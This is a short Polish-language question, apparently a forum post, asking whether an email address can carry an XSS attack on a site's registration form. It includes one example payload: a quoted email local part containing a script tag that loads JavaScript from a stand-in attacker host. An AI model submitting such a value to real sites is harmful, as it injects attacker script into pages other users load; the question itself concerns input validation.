Czy ataki XSS są możliwe za pośrednictwem adresów e-mail?
Zastanawiam się, czy adres e-mail może być użyty do ataków XSS.
Załóżmy, że istnieje strona internetowa, na której można zarejestrować się i podać swój adres e-mail. Jeśli ktoś chce zaatakować daną witrynę, może utworzyć adres e-mail, taki jak ten:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
a następnie użyj tego adresu e-mail, aby zaatakować witrynę.
Czy cytat lub tag skryptu jest dozwolony w adresie e-mail?